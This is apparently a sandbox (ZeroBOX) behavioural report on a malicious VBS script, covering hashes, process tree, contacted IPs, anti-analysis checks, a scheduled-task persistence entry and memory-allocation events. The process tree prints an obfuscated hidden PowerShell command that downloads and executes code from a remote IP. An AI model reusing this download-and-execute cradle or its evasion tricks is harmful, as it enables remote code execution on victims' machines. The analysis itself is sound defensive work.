Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 4, 2023, 5:04 p.m.	Sept. 4, 2023, 5:06 p.m.

Size	1.9KB
Type	ASCII text, with CRLF line terminators
MD5	`028a0617ed7c664bd7ba075bf52fb984`
SHA256	`3913fb8e7856c34e9ebf431fd3fe12fa353ca3311783a507713251a8049ce37f`
CRC32	`8D4DD1DA`
ssdeep	`24:yn37xaqVgvARr3mYpFpG5A5cw3JzqTvAHRcZRLKvV+ypAWrxywqa+yqr7:y37x5Xr3mEm+zJ+TvAHRczLKv5pRU`
Yara	Antivirus - Contains references to security software

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\gen.txt.vbs
3040
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/=//=//=//=//=//=//=//=//=//=/(''http://51.254.49.49:222/truintobroth/cod.jpg'')'.RePLACe('/=//=//=//=//=//=//=//=//=//=/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
  2192

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
51.254.49.49	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 4, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 4, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2023, 5:04 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 4, 2023, 5:04 p.m.			0	0

Command line console output was observed (50 out of 75 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: IsPublic IsSerial Name BaseType console_handle: 0x0000001b	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: True True Byte[] System.Array console_handle: 0x00000023	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: True True Byte[] System.Array console_handle: 0x00000027	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: True True Byte[] System.Array console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: The term 'ï»¿$Content' is not recognized as the name of a cmdlet, function, scr console_handle: 0x00000023	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: ipt file, or operable program. Check the spelling of the name, or if a path was console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: At line:1 char:12 console_handle: 0x00000047	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: + ï»¿$Content <<<< = @' console_handle: 0x00000053	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: + CategoryInfo : ObjectNotFound: (ï»¿$Content:String) [], Command console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: NotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: Name : Micros oftEdgeUpdate console_handle: 0x0000008f	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: Path : \Micros oftEdgeUpdate console_handle: 0x00000093	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: State : 3 console_handle: 0x00000097	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: Enabled : True console_handle: 0x0000009b	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: LastRunTime : 1899-12-30 오전 12:00:00 console_handle: 0x0000009f	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: LastTaskResult : 1 console_handle: 0x000000a3	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: NumberOfMissedRuns : 0 console_handle: 0x000000a7	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: NextRunTime : 2023-09-05 오전 1:26:21 console_handle: 0x000000ab	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: Definition : System.__ComObject console_handle: 0x000000af	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: Xml : <?xml version="1.0" encoding="UTF-16"?> console_handle: 0x000000b3	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <Task version="1.2" xmlns="http://schemas.microsoft.com/wi console_handle: 0x000000b7	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: ndows/2004/02/mit/task"> console_handle: 0x000000bb	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <RegistrationInfo> console_handle: 0x000000bf	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <Description>Runs a script every 2 minutes</Descriptio console_handle: 0x000000c3	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: n> console_handle: 0x000000c7	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: </RegistrationInfo> console_handle: 0x000000cb	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <Triggers> console_handle: 0x000000cf	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <TimeTrigger> console_handle: 0x000000d3	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <Repetition> console_handle: 0x000000d7	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <Interval>PT2M</Interval> console_handle: 0x000000db	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <StopAtDurationEnd>false</StopAtDurationEnd> console_handle: 0x000000df	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: </Repetition> console_handle: 0x000000e3	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <StartBoundary>2023-09-05T01:24:21</StartBoundary> console_handle: 0x000000e7	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <Enabled>true</Enabled> console_handle: 0x000000eb	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: </TimeTrigger> console_handle: 0x000000ef	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: </Triggers> console_handle: 0x000000f3	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <Settings> console_handle: 0x000000f7	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesP console_handle: 0x000000fb	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: olicy> console_handle: 0x000000ff	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <DisallowStartIfOnBatteries>false</DisallowStartIfOnBa console_handle: 0x00000103	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: tteries> console_handle: 0x00000107	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> console_handle: 0x0000010b	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <AllowHardTerminate>true</AllowHardTerminate> console_handle: 0x0000010f	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <StartWhenAvailable>false</StartWhenAvailable> console_handle: 0x00000113	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvai console_handle: 0x00000117	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: lable> console_handle: 0x0000011b	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <IdleSettings> console_handle: 0x0000011f	1	1
WriteConsoleW Sept. 4, 2023, 5:04 p.m.	buffer: <Duration>PT10M</Duration> console_handle: 0x00000123	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d27a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d24e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d24e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d24e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d20e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d20e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d20e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d20e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d20e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d20e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d1be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d1be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d1be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d26e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d26e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d26e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d22a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d26e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d26e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d26e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d26e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d26e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d26e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d26e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d25a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d25a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d25a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d25a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d25a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d25a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d25a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d25a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d25a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d25a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d25a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d25a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d25a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d25a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d1ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d1ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d2720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d2720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d2720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d2720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d2720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2023, 5:04 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d2720 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 4, 2023, 5:04 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 158 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02080000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722d1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x722d2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f5a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f34000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f6b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f67000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f65000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f35000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f5c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f36000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f6c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f55000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f57000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f59000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05001000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05002000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05003000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05004000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05005000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05006000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2023, 5:04 p.m.	process_identifier: 2192 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05007000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
